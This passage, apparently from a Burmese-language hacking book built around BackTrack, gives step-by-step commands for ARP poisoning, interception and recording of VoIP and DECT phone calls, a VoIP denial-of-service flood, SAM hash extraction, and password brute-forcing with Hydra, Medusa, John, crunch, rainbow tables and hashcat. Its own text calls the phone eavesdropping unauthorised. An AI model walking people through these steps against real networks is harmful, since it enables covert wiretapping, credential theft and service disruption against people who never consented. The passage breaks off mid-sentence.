ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၂။ ထို႕ေနာက္ ARP Poisoning attack ကိုစတင္ႏိုင္ရန္အတြက္ Arpspoof ကို launch လုပ္ရပါမည္။ Help
ဖိုင္ကို ၾကည္႕ရွဳရန္အတြက္ Command line ေပၚတြင္ arpspoof ဟုရိုက္ထည္႕ရံုသာျဖစ္သည္။
wireshark
မ်က္ပြင့္စာေပ 229
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
230 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၈။ Capture Interfaces Dialog box ေပၚမွ Packets မ်ားကို ဖမ္းယူရန္အတြက္ Network Interface ကို
ေရြးခ်ယ္ၿပီးေနာက္ Start ကို Click ႏိွပ္ေပးရပါမည္။
၉။ အကယ္၍ Network ေပၚမွ Active ျဖစ္ေနေသာ Phone Call မ်ားရိွခဲ့ပါက Wireshark ၏ Display
ေပၚတြင္ Packet မ်ားကို ေတြ႕ျမင္ရမည္ျဖစ္သည္။ packet မ်ား ဖမ္းယူျခင္းမွ ရပ္တန္႕ရန္အတြက္ Ctrl + E
ကိုတြႏ
ဲ ိွပ္ျခင္း သို႕မဟုတ္ Capture> Stop ကုိေရြးခ်ယ္ႏိုင္ပါသည္။
မ်က္ပြင့္စာေပ 231
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Using VoIPong
ဖုန္းတစ္ခုအေပၚေခ်ာင္းေျမာင္းနားေထာင္ျခင္းသည္ ခြင့္ျပဳခ်က္မရိွဘဲ phone ေျပာဆိုမႈမ်ားကို ခိုးယူနား
ေထာင္ျခင္း လုပ္ေဆာင္ခ်က္တစ္ရပ္ပင္ျဖစ္သည္။ ယခုအပိုင္းတြင္ Target Network ေပၚမွ VoIP Call
မ်ားကို ေထာက္လွမ္းႏိုင္ရန္အတြက္ VoIPong အသံုးျပဳျခင္းကိုေဖာ္ျပေပးမည္ျဖစ္သည္။ ၄င္းသည္အမွန္
တကယ္ေျပာဆိုမႈမ်ား၏ WAV File မ်ားကိုပင္ျပန္လည္ထုတ္ေပးႏိုင္စြမ္းရိွပါသည္။ VoIPong သည္ VoIP
Call မ်ားကို ေထာက္လွမ္းမႈ ျပဳလုပ္ႏိုင္ေသာ အလြန္အမင္း ရိုးရွင္းသည္႕ Progam ျဖစ္သည္။ ထို႕ေၾကာင့္
Network တစ္ခုတြင္ ေခၚဆိုေသာ ဖုန္း Call တစ္ခုကို ၾကားျဖတ္နားေထာင္လိုေသာအခါ VoIP သည္
အလြန္အသံုး၀င္ေသာ Program ျဖစ္သည္ကို ျငင္းဆန္ႏိုင္မည္မဟုတ္ပါ။
232 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
cd /usr/local/etc/voipong
nano /etc/voipong.conf
voipong –h
voipong –c /etc/voipong.conf
မ်က္ပြင့္စာေပ 233
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Mastering UCSniff
ယခုအပိုင္းတြင္ UCSniff ၏အသံုးျပဳပံုကိုေလ့လာၾကည္႕ၾကပါမည္။ Ucsniff သည္ VoIP ႏွင့္ IP Security
တို႕ကို Assement ျပဳလုပ္ႏိုင္ေသာ Tool တစ္ခုျဖစ္ပါသည္။ ၄င္းကို လံုၿခံဳေရးေဆာင္ရြက္သူမ်ားကို VoIP
Phone ႏွင့္ IP Video Call မ်ားမွ တရားမ၀င္ေသာ ေခ်ာင္းေျမာင္းနားေထာင္ျခင္းမ်ားကို စစ္ေဆးရန္
အတြက္ အသံုး၀င္လွေသာ Tool တစ္ခုအျဖစ္ အသံုးျပဳႏိုင္ပါသည္။
234 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
ယခုအပိုင္းကို လုပ္ေဆာင္ႏို္င္ရန္အတြက္
cd /downloads
cd ucsniff-3.20
မ်က္ပြင့္စာေပ 235
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
apt-get update
apt-get install build-essential
apt-get install zlib1g-dev liblzo2-dev
apt-get install libpcap0.8-dev libnet1-dev
apt-get install libasound2-dev
apt-get install libbz2-dev
apt-get install libx11-dev
apt-get install libxext-dev
apt-get install libfreetype6-dev
apt-get install vlc
apt-get install libvlc-dev
apt-get install libavformat-dev
apt-get install libavdevice-dev
apt-get install libswscale-dev
apt-get install libavfilter-dev
apt-get install libx264-dev
apt-get install libav
၆။ ထို႕ေနာက္ VLC ႏွင့္ GUI Support တို႕ႏွင့္ UCSniff ကို Configure ျပဳလုပ္ရန္လိုအပ္ပါမည္။
236 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
make
make install
၈။ ထို႕အျပင္ ./ucsniff –G command ကို executing ျပဳလုပ္ၿပီးေနာက္တြင္ UCSniff ၏ GUI version ကို
Launch ျပဳလုပ္ႏိုင္ပါသည္။
မ်က္ပြင့္စာေပ 237
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
238 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
ယခုအပိုင္းတြင္ Network ေပၚမွ VoIP traffic ကို ေစာင့္ၾကည္႕ရန္အတြက္ MITM Mode အတြင္းတြင္
UCSniff ကိုသတ္မွတ္ခဲ့ရပါသည္။ UCSniff သည္ Network ကို ARP Poisoning ျပဳလုပ္ျခင္းႏွင့္
ေမာင္းႏွင္ထားျခင္းကို အဆံုးမသတ္မခ်င္း Packet မ်ားကို စုေဆာင္းျခင္းကိုစတင္ေပးပါမည္။
မ်က္ပြင့္စာေပ 239
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Mastering Xplico
ယခုအပိုင္းတြင္ Xplico ကိုအသံုးျပဳၾကည္႕ၾကပါမည္။ Xplico သည္ Internet Traffic Caputre Tool တစ္ခု
ျဖစ္ၿပီး ၄င္းတြင္ FTP, e-mail, VoIP ႏွင့္အျခားေသာ လုပ္ေဆာင္ခ်က္မ်ားအပါအ၀င္ ကြျဲ ပားျခားနားေသာ
Application မ်ားမွ Data မ်ားကို ဖမ္းယူရန္အတြက္ အသံုးျပဳႏိုင္ပါသည္။ Xplico သည္ Network Forensic
Analysis Tool (NFAT) တစ္ခုအျဖစ္ အလြန္အသံုး၀င္လွပါသည္။
ယခုအပိုင္းကိုလုပ္ေဆာင္ႏိုင္ရန္အတြက္
240 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၃။ Xplico ကို BackTrack> Digital Forensics> Forensic Analysis Menu တြင္ ထည္႕သြင္းေပးပါလိမ့္
မည္။
cd /opt/xplico/bin
ယခုအပိုင္းတြင္ SIP Traffic ကို ဖမ္းယူရန္အတြက္ Xplico ကိုအသံုးျပဳခဲ့ပါသည္။ Xplico ကို Network
ေပၚမွ Packet မ်ားကို analyze ျပဳလုပ္ရန္ သံုးစြၿဲ ပီး အဖိုးတန္ေသာ အခ်က္အလက္မ်ားကို ရရိွရန္အတြက္
မ်က္ပြင့္စာေပ 241
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
ယခုအပိုင္းကို လုပ္ေဆာင္ႏိုင္ရန္အတြက္
cd /pentest/passwords/sipcrack
./sipdump
242 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
မ်က္ပြင့္စာေပ 243
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
ယခုအပိုင္းကိုၿပီးျပည္႕စံုေအာင္ စမ္းသပ္ႏိုင္ရန္အတြက္
voiphopper
244 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
voiphopper –I eth0 –c 2
မ်က္ပြင့္စာေပ 245
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
ယခုအပိုင္းျပဳလုပ္ရန္အတြက္
cd /pentest/voip/iaxflood
၂။ Iaxflood ကိုအသံုးျပဳရမည္႕ ပံုစံမွာ ./iaxflood [source IP] [Destination IP] [Number of Packets]
ျဖစ္ေသာေၾကာင့္ သန္းခ်ီေသာ Packet မ်ားကို Target Ip ကို ပိ႕ု လႊတ္ေပးရန္အတြက္ ေအာက္ပါအတိုင္း
အသံုးျပဳရပါမည္။
ယခုအပိုင္းတြင္ Iaxflood ကိုအသံုးျပဳ၍ Network ၏ Target ေပၚတြင္ Denial of Service Attack ကို
ျဖစ္ေစရန္အတြက္ ျပဳလုပ္ျခင္းကိုေဖာ္ျပေပးခဲ့သည္။ ယခုအပိုင္းတြင္ Iaxflood ရိွေသာ Directory
လမ္းေၾကာင္းကို navigate ျပဳလုပ္ျခင္းျဖင့္ စတင္ခဲ့ၿပီး Target Device သိ႕ု 1 million ခန္႕ရိွေသာ Packet
မ်ားကို ပို႕လႊတ္ကာ DoS attack ကိုလုပ္ေဆာင္ျခင္းကို ေဖာ္ျပခဲ့ပါသည္။
246 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
ယခုအပိုင္းကိုေအာင္ျမင္စြာလုပ္ေဆာင္ႏိုင္ေစရန္အတြက္
msfconsole
search SIP
မ်က္ပြင့္စာေပ 247
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
use auxiliary/scanner/sip/options
run
ယခုအပိုင္းတြင္ Network မွ SIP Device မ်ားကို Scan လုပ္ရန္ႏွင့္ Identify ျပဳလုပ္ရန္အတြက္ Metasploit
ကိုအသံုးျပဳခဲ့ပါသည္။ ေတြ႕ျမင္ရသည္႕အတိုင္းပင္ Username grabbing မွ Authentication Capture
မ်ားအထိ Module မ်ား၏ Range သည္အလြန္မ်ားျပားေၾကာင္း ေတြ႕ရမည္ျဖစ္သည္။ Scanner Module
ကို လုပ္ေဆာင္ေသာအခါတြင္ တည္ရိွၿပီးျဖစ္သည္႕ Host မ်ား၏ List ကိုရရိွပါမည္။ ၄င္းသည္
ေနာက္တစ္ခ်ိန္တြင္ Attack ျပဳလုပ္ရန္ႏွင့္ Exploit မ်ားကို လုပ္ေဆာင္ရန္အတြက္ User မ်ား၏ စာရင္းကို
ေဖာ္ျပေပးမည္ျဖစ္သည္။
248 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
ယခုအပိုင္းကို လုပ္ေဆာင္ႏိုင္ရန္အတြက္
၁။ Terminal Window ကိုဖြင့္ၿပီး deDECTed ကို Install ျပဳလုပ္ရန္ ေအာက္ပါ Command မ်ားကို
အသံုးျပဳပါ။
apt-get update
၂။ Audacity ကို Install ျပဳလုပ္ရပါမည္။ Audacity သည္ Audio ကို တည္းျဖတ္ Mixing ျပဳလုပ္ႏိုင္ေသာ
Open Source တစ္ခုျဖစ္ပါသည္။
မ်က္ပြင့္စာေပ 249
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
cd /pentest/telephony/dedected
၄။ ထိ႕ု ေနာက္ ေအာက္ပါ Command မ်ားကိုလုပ္ေဆာင္ျခင္းျဖင့္ လိုအပ္ေသာ Driver မ်ားကို Load ျပဳလုပ္
ေပးရပါမည္။
cd /pentest/telephony/dedected/com-on-air_cs-linux
make node
make load
./dect_cli
callscan
၇။ ထို႕ေနာက္ Detect ေတြ႕ရိွသမွ်ေသာ Phone Call တိုင္းကို Record ျပဳလုပ္ရန္ autorec ကိုအသံုးျပဳပါ။
autorec
၈။ Phone call မ်ားရရိွလွ်င္ ၄င္း Stream မ်ားကို ေအာက္ပါ Command ျဖင့္ Decode ျပဳလုပ္ႏိုင္ပါသည္။
./decode.sh
၉။ ထို႕ေနာက္ ထို Phone Call မ်ားကို Audacity ကို ထည္႕သြင္းေပးရပါမည္။ Application Launcher ကို
ေခၚယူရန္အတြက္ Alt + F2 ကိုတႏ
ြဲ ိွပ္ပါ။ Launcher ထဲတြင္ audacity ဟုရိုက္ထည္႕ၿပီး Run ခလုတ္ကို
Click ႏိွပ္ေပးရပါမည္။
250 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
မ်က္ပြင့္စာေပ 251
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Make unload
Rm /dev/coa
252 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Chapter 9
Password Cracking
Password မ်ားကိုထိုးေဖာက္ခိုးယူျခင္း
မ်က္ပြင့္စာေပ 253
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Introduction
ယခုအခန္းတြင္ User Account မ်ားကို ၀င္ေရာက္ႏိုင္ရန္အတြက္ Password မ်ားကို Crack လုပ္ျခင္း၏
နည္းလမ္းေပါင္းစံုကိုေဖာ္ျပေပးမည္ျဖစ္သည္။ Password မ်ားကို Crack ျပဳလုပ္ျခင္းသည္ ထုိးေဖာက္မႈကို
စမ္းသပ္သူမ်ားအတြက္ အလုပ္တစ္ခုဟုလည္း ဆိုႏိုင္ပါသည္။ ပင္ကိုအားျဖင့္ System တိုင္းအတြက္
မလံုၿခံဳဆံုးေသာအစိတ္အပိုင္းသည္ User မ်ားမွ Password မ်ားကိုရိုက္ထည္႕သည္႕ ေနရာဟုလည္း
ဆိုႏိုင္ပါသည္။ အေၾကာင္းမွာ မ်ားစြာေသာလူမ်ားသည္ ပင္ကိုအားျဖင့္ Strong ျဖစ္ေစသည္႕ Password
မ်ားေပးျခင္းကိုမႏွစ္သက္ဘဲေမ့ေလွ်ာ့ေသာအခါတြင္ Reset ျပဳလုပ္ရျခင္းကိုလည္း မုန္းတီးၾကေလ့ရိွသည္။
ထိုအခ်က္သည္ပင္ Hacker မ်ားအတြက္ လြယ္ကူေသာ Target မ်ားျဖစ္လာေစပါသည္။ ယခု Password
cracking အခန္းတြင္ ေလ့လာရမည္႕ က႑မ်ားမွာ
254 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Hydra သည္ မ်ားစြာေသာ Protocol မ်ားကို အေထာက္အပံ့ေပးပါသည္။ ထို Protocol မ်ားမွာ FTP, HTTP,
HTTPS, MySQL, MSSQL, Oracle, Cisco, IMAP, VNC ႏွင့္အျခားေသာ Protocol မ်ားျဖစ္သည္။
သတိထားရန္အခ်က္မွာ Hydra ကိုအသံုးျပဳျခင္းျဖင့္ Attack ျပဳလုပ္ခံရသူမ်ားကို သိသာေစပါသည္။
မ်က္ပြင့္စာေပ 255
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
ထို႕ေနာက္ Loop around users ႏွင့္ Try empty password ဟူေသာ Option ႏွစ္ခုကို ေရြးခ်ယ္ေပးထား
ရပါမည္။
256 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၃။ ထို႕ေနာက္ Tuning Tab ကိုေရြးခ်ယ္ပါ။ Performance Options ေအာက္မွ Number of Tasks တြင္ 16
ကို 2 ဟုေရြးခ်ယ္ပါမည္။ ထိုသို႕ျပဳလုပ္ရျခင္းမွာ Process မ်ားျပားစြာ တစ္ခ်ိန္တည္းတြင္ ေမာင္းႏွင္မိ
ျခင္းသည္ Server ကို ေႏွးေကြးေစမည္႕အတြက္ေၾကာင့္ ျဖစ္ပါည္။ ထို႕ေနာက္ Exit after first found pair
Option ကိုလည္းေရြးခ်ယ္ေပးထားသင့္ပါသည္။
မ်က္ပြင့္စာေပ 257
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
258 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
မ်က္ပြင့္စာေပ 259
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
ထို႕အျပင္ Loop around users ႏွင့္ Try empty password option တို႕ကိုလည္းေရြးခ်ယ္ေပးထားရပါ မည္။
260 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၃။ ထိ႕ု ေနာက္ Tuning Tab ကိုေရြးခ်ယ္ပါ။ Performance Options ေအာက္မွ Number of tasks တြင္ 16
မွ 2 သို႕ေျပာင္းလဲေပးထားရပါမည္။ အေၾကာင္းမွာ လုပ္ေဆာင္ခ်က္မ်ား မ်ားျပားလြန္းျခင္းသည္ Server ၏
အရည္အေသြးကို က်ဆင္းေစျခင္းေၾကာင့္ျဖစ္ပါသည္။ လုပ္ေဆာင္စရာမလိုေသာ္လည္း လုပ္ေဆာင္ထား
သင့္ေသာအခ်က္တစ္ခုမွာ Exit after first found pair option ကိုေရြးခ်ယ္ေပးထားရန္ပင္ ျဖစ္ပါသည္။
မ်က္ပြင့္စာေပ 261
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
262 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
မ်က္ပြင့္စာေပ 263
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
264 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
-p [location of password list]: ၄င္း Option သည္ Password list file ရိွသည္႕ေနရာကို သတ္မွတ္ေပး
ရန္အသံုးျပဳပါသည္။
AFP
CVS
FTP
HTTP
IMAP
MS SQL
MySQL
NetWare
NNTP
pcAnywhere
POP3
PostgreSQL
REXEC
RLOGIN
RSH
SMBNT
SMTP AUTH
SMTP VRFY
SNMP
SSHv2
Subversion
266 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Telnet
VMware authentication
VNC
Generic wrapper
Web form တို႕ျဖစ္ပါသည္။
Password profiling
ယခုအပိုင္းတြင္ Password attack ကိုမစတင္မီတြင္ password မ်ားကို profile ျပဳလုပ္ျခင္းကို ေလ့လာ
ၾကည္႕ၾကမည္ျဖစ္သည္။ Password မ်ားကို profile ျပဳလုပ္ရျခင္း၏ ရည္ရြယ္ခ်က္မွာ တိုက္ခိုက္မည္႕
Machine, Business တို႕မွ အခ်က္အလက္မ်ားကိုစုေဆာင္းထားျခင္းျဖင့္ Password ကိုခန္႕မွန္း လာႏိုင္
မည္ျဖစ္ၿပီး ပိုမိုေသးငယ္ေသာ wordlist ျဖင့္အစားထုိးအသံုးျပဳေစႏိုင္မည္ ျဖစ္ေသာေၾကာင့္ အခ်ိန္ၾကာျမင့္မႈ
ကိုေလွ်ာ့ခ်ေပးေစႏိုင္မည္ျဖစ္ပါသည္။ ထိုသို႕ျပဳလုပ္ရန္အတြက္ Ettercap ႏွင့္ Traffic မ်ားကို Sniff ျပဳလုပ္
ရန္အတြက္ ARP Poisoning function ကိုအသံုးျပဳရပါလိမ့္မည္။ ထို႕ေၾကာင့္ လုပ္ေဆာင္ခ်က္မ်ားကို
ေလ့လာၾကည္႕ၾကပါမည္။
၁။ Ettercap ကို Configuration ျပဳလုပ္ရပါမည္။ ထို႕ေနာက္ ေရွးဦးစြာ Configuration file ကို locate
ျပဳလုပ္ကာ Vim ကိုအသံုးျပဳ၍ ျပင္ဆင္ေပးရပါလိမ့္မည္။ ထို႕ေၾကာင့္ ေအာက္ပါ Command ကိုအသံုးျပဳရ
ပါလိမ့္မည္။
locate etter.conf
vi/etc/etterconf
မ်က္ပြင့္စာေပ 267
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
ettercap –G
268 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၇။ ထိ႕ု ေနာက္ Scan for hosts ကို ဖြင့္ေပးရပါမည္။ ထိုသို႕ျပဳလုပ္ရန္အတြက္ Ctrl + S ကိုတြႏ
ဲ ိွပ္၍ ျဖစ္ေစ
Hosts Menu မွ Scan for hosts ကိုေရြးခ်ယ္၍ျဖစ္ေစ အသံုးျပဳႏိုင္ပါသည္။
မ်က္ပြင့္စာေပ 269
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
270 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၁၂။ ထို႕ေနာက္ ရွာေဖြေနေသာ Usernames ႏွင့္ Passwords တိ႕ု ကုိေတြ႕ရိွၿပီးေသာအခါတြင္ Ettercap ကို
ျပန္ပိတ္ရန္လိုအပ္ပါသည္။ ထိုသို႕ျပန္ပိတ္ရန္အတြက္ Ctrl +E ကိုတြႏ
ဲ ိွပ္၍ ျဖစ္ေစ၊ Start Menu မွ Stop
sniffing ကိုေရြးခ်ယ္၍ျဖစ္ေစ ရပ္တန္႕ေပးႏိုင္ပါသည္။
မ်က္ပြင့္စာေပ 271
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
msfconsole
use auxiliary/gather/search_email_collector
272 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
show options
run
မ်က္ပြင့္စာေပ 273
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
မစတင္မီတြင္ Remote exploit hack ျဖင့္ျဖစ္ေစ၊ တိုက္ခိုက္မည္႕ကြန္ပ်ဴတာတြင္ USB သိ႕ု မဟုတ္ DVD
ROM Drive ျဖင့္ BackTrack ကိုေမာင္းႏွင္ထားျခင္းျဖင့္ျဖစ္ေစ အဆင္သင့္ျဖစ္ေနၿပီဟု ယူဆပါသည္။
Fdisk -1
၃။ Window SAM file ရိွသည္႕ Location ကို ၀င္ေရာက္ရပါမည္။ ေအာက္ပါ Command ကိုအသံုးျပဳႏိုင္
ပါသည္။
cd /target/windows/system32/config
ls –al
274 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၅။ SamDump2 ကိုအသံုးျပဳ၍ SAM ဖိုင္မွ Hash မ်ားကို Extract ျပဳလုပ္ကာ Root user directory ထဲရိွ
Hashes ဟူေသာ Folder တြင္ Hash.txt ဖိုင္အျဖစ္ Output လုပ္ယူပါမည္။ ေအာက္ပါ Command
ကိုအသံုးျပဳရမည္ျဖစ္ပါသည္။
cd /pentest/passwords/jtr
./john /root/hashes/hash.txt
မ်က္ပြင့္စာေပ 275
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၁။ Terminal Window ကိုဖြင့္ၿပီး Package list ကို update ျပဳလုပ္ရန္အတြက္ ေအာက္ပါ Command
ကိုအသံုးျပဳရပါမည္။
apt-get update
/pentest/passwords/crunch
276 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၆။ ထိ႕ု ေနာက္ အနည္းဆံုး ၈ လံုးမွ အမ်ားဆံုး ၁၀ လံုးရိွေသာ Character မ်ားႏွင့္ Character Set အျဖစ္
ABCDEFGabcdefg0123456789: အစရိွသျဖင့္ Password List တစ္ခုကိုတည္ေဆာက္ရန္အတြက္
Command ကို အသံုးျပဳေပးရပါမည္။
nano /root/Desktop/generatedCrunch.txt
မ်က္ပြင့္စာေပ 277
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
278 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
cd /pentest/passwords/rainbowcrack/
၂။ ထိ႕ု ေနာက္ MD5-အေျချပဳ Rainbow Table ကို ထုတ္ေပးႏိုင္ရန္အတြက္ rten ကိုေအာက္ပါ Command
ကိုအသံုးျပဳ၍ ေမာင္းႏွင္ေပးရပါမည္။
မ်က္ပြင့္စာေပ 279
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
280 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
cd /pentest/passwords/oclhsascat+
./cdudaHashcat-plus64.bin –help
မ်က္ပြင့္စာေပ 281
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
282 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၆။ ထို႕ေနာက္ Special Character မ်ား၊ Uppercase Character မ်ား၊ Lowercase Character မ်ားႏွင့္
ကိန္းဂဏန္းမ်ားပါ၀င္ေသာ Custom Character Set တစ္ခုကိုသတ္မွတ္ၿပီး ၄င္းတို႕ကို အတူတကြ
